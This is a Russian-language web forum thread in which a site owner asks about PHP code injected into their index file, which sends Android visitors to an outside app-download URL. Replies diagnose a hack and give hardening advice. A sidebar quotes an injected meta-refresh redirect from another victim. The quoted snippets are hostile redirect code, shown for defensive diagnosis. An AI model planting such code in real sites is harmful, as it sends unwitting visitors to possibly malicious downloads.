ephiop

Помогите узнать, что это такое.

Рекомендуемые сообщения

ephiop    0

в индекс вставляет код 

<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://load-app.org/m/?mobile_version=CleanRu");
die();
}
?>
что это и как предотвратить? Изменено пользователем afwollis
пппппппппппппп [code]

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
halfhope    172

У Вас взломали сайт, ищите дыру, закрывайте.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
sv2109    437

если зашли с андроида то перекидывает на

http://load-app.org/m/?mobile_version=CleanRu
похоже сайт загрузки какого-то приложения. 

я когда исправлял вам ошибку на вашем сайте не обратил на это внимание, что это вредоносный код, подумал что это вы сами что-то  добавили

 

пс удалить все, и да, искать дыры в сайте + менять все пароли на фтп и в админку, вспоминать что устанавливали в последнее время, какие модули и кому доступ давали к сайту.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ephiop    0

это поисковый запрос, я это читал,

 

понятно что дырка, где ???

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
AlexDW    881

99% всех причин подобных радостей - использование платных дополнений на халяву (здравствуй, варез!), раздача доступа кому попало, слабые/идиотские пароли и банальные вирусы на компе, с которого осуществляется доступ.

 

Изредка - могут получить доступ через брешь на соседнем сайте у хостера.

 

Насчет того "где?!" - смотреть логи сайта и FTP

 

Чтоб такого не было - исключить практику вареза, если таковая имеется. Ограничить доступ FTP по ip, использовать актуальный и адекватно настроенный антивирус, не раздавать доступ кому попало, если необходимость есть - резать пользователя в правах по максимуму, только то что необходимо. Не заходить с "левых" машин, либо использовать для этого специальный урезанный в правах аккаунт. Делать нормальные пароли, а не вида 12345.

 

Сильно желательно регулярно делать бекап файлов и БД

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Похожий контент

    • От alldell
      Добрый вечер! Кто сталкивался помогите) Взломали сайты, пока заметил на двух оба на opencart, всего Пять на хостинге. Три на opencart два на wordpress. Недавно установил новый сайт
      на OcStore скачивал с форума, шаблон с оф сайта разработчика TechStore. Суть проблемы, когда заходишь на сайт с телефона вылезает на новостной баннер и ведёт по ссылке на Риа новости) И эта зараза переодически пропадает и появляется снова. Кто знает как это лечить? Может кто с этим сталкивался )
    • От kolek5520
      Добрый день всем.
      Гонял сайт через  сервис http://www.webpagetest.org
       
      и заметил, среди запросов, странные ведущие на ALIEXPRESS  И com-sale.ru
      https://yadi.sk/i/Nhiz-49D3QpYV5
       
    • От kaaspb
      Добрый день
      сейчас начитался форума и понял,что столкнулся с проблемой. с которой многие сталкивались: ничего не понимая в вопросах сайтостроительства заказал сайт фрилансеру, он написал сколько это будет стоить,я оплатил, он все вроде бы сделал, а сейчас с ним нет связи. И теперь не понимаю,что покупалось для нашего сайта, что он использовал.... нет ли дыр или троянов каких на сайте
       
      есть ли специалисты по безопасности проверить сайт, естественно заранее договорившись об оплате
      спасибо
    • От storagevash
      Ещё прежде не сталкивался с вопросами безопасности ранее. У меня одна база данных на два  сайта, оба на ocstore 1.5.5.1.2.  Один посложнее  весь в модулях, другой облегчённый. То на одном, то на другом  начинаются вредоносные ставки во все страницы

      <meta http-equiv="refresh" content="0;url=http://ww2.googlejavascript.com/?folio=7POJ4E717" />
       
       сканирую бесплатными сервисами, но не могу  найти, что именно вписывает вредоносные коды. Как найти виновника?! Эту дырку в сайте. Что порекомендуете?
       
      сейчас  www.2450210.ru - полностью атакован. А главный на той же базе www.efler.ru - работает. И сканеры не видят там  проблем.  Причём на 2450210  я  уже  перезалил с исходника  окстор  все  javescript , отключил все модули. куда  мог  попасть вредоносный код?
    • От Absalem
      Всем привет!
      Пациент - *******
      На главной странице с правой стороны маленькие баннеры, при клике по любому из них в новой вкладке открывается целевая страница, а в предыдущей вкладке вместо моего исходного сайта происходит непонятный редирект, который ведёт то на лингвалео, то на озон, то ещё куда (срабатывает по одному разу на устройство/браузер).
      Не могу найти код-вредитель, даже проверила айболитом - ничего не находит :(
      Помогите, пожалуйста!
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу